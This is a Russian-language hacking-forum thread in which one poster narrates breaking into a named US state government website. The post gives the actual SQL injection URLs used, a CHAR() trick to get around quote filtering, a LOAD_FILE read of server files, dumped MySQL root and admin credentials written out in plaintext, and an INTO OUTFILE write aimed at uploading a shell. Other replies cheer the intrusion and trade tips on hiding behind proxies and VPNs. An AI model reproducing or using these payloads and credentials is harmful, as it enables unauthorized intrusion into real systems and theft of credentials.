Заливаем шелл на .gov

Discussion in 'Уязвимости' started by [53x]Shadow, 14 Aug 2007.

  1. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    В принципе банальная скуля, но все таки удалось залить шелл на gov, при фильтрации ковычек...
    Подумал, новичкам будет интересно, если что модеры смело переносите в скули ;)

    www.dfcm.utah.gov

    Сначала как обычно:
    Code:
    http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8/*
    4.0.18-log
    [email protected]
    dfcm


    Думал на этом все закончится, при чем кавычки экранируются...
    Но
    Code:
    http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,user,password,5,6,7,8+from+mysql.user+limit+0,1/*
    root:2e64a4f076c68549

    и есть filepriv
    Code:
    http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,3,LOAD_FILE(CHAR(47,101,116,99,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)),5,6,7,8+from+mysql.user/*
    читаем /etc/passwd для проверки, естественно с обходом фильтрации через char().
    Заодно перелопатил все стандартные пути к конфигам, нашел вроде httpd.conf - оказался левый, ну думаю совсем плохо путей то нет((

    Да еще into outfile не катит кавычки фильтруются и ничего не помагает ни хекс, ни чар(((

    Зато нашел таблицу login
    Code:
    http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,username,password,5,6,7,8+from+login/*
    и вытащил
    admin:gmjbcbss

    Обрадовался, есть админка и пасс подошел
    http://www.dfcm.utah.gov/admin/

    Но оказалась тупая цмска по управлению проектами и новостями, попытался через аплоады файлов, а там фильтрация и только .pdf вообщем парился долго, забил...
    Думаю все, НО тут вспомнил про хеш рута, и решил а почему бы и нет, короче в джоник его и о счастье нашел (пасс выкладывать не буду чтобы сайт сразу не роняли все кому не лень)!

    Бегом в phpMyAdmin, ну думаю пора заливать =).

    Достаем пути до сайта, спасибо ettee, а то ночной затуп =\
    Code:
    http://www.dfcm.utah.gov/phpmyadmin/phpinfo.php
    Ну и через sql заливаем
    Code:
    select 'test' from login into outfile '../../../apache/htdocs/df.txt';
    Вообщем тестовый файл смотреть здесь http://www.dfcm.utah.gov/df.txt

    ЗЫ
    За стиль описания прошу сильно не ругаться, писал в почти сонном состоянии =\
     
    #1 [53x]Shadow, 14 Aug 2007
    Last edited: 14 Aug 2007
    11 people like this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    спс, как раз на пиво не хватает)
     
    #2 Spyder, 14 Aug 2007
    2 people like this.
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    ммм сори но что это за наркоманство?

    Дальше корня не убежишь.
     
    #3 guest3297, 14 Aug 2007
    1 person likes this.
  4. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Просто не прописал оставшуюся часть, чтобы все подряд не заливали =\
     
    #4 [53x]Shadow, 14 Aug 2007
    1 person likes this.
  5. Dimon_Aka_Sexxx

    Dimon_Aka_Sexxx New Member

    Joined:
    21 Jan 2007
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Красиво )
     
    #5 Dimon_Aka_Sexxx, 15 Aug 2007
  6. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Типично! 5 из 10 gov или edu уязвимы на скули.!!!!!
     
    #6 fly, 15 Aug 2007
  7. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Ну я бы не был так категоричен, это смотря по какому критерию отбирать! А так если через гугл, то имхо 1 из 10 и причем не всегда мона шелл пропихнуть... А в разделе скулей я вообще не видел ни одной доведенной до заливки =\
     
    #7 [53x]Shadow, 15 Aug 2007
  8. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    молодец, +

    я бы еще 3 способа заливки здесь описал )
     
    #8 darky, 15 Aug 2007
  9. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Вы под колпаком.
     
    #9 iv., 15 Aug 2007
  10. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    эт ты к чему вообще?!?! =\
    А что, прокси кто-то отменял?
     
    #10 [53x]Shadow, 18 Aug 2007
    1 person likes this.
  11. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Прокси только цыпочкой. Лучше прокси на ботах+ vpn!
     
    #11 fly, 18 Aug 2007
  12. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Чет сайт их сдох )
     
    #12 Ksander, 18 Aug 2007
  13. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Да видимо зря в паблик выложил, умельцы сразу добрались...=\
     
    #13 [53x]Shadow, 18 Aug 2007
  14. Freki

    Freki New Member

    Joined:
    17 Aug 2007
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    Хм, интересная тема =]..

    Насчет edu не знаю но вот gov это точне не 5 из 10.
     
    #14 Freki, 19 Aug 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.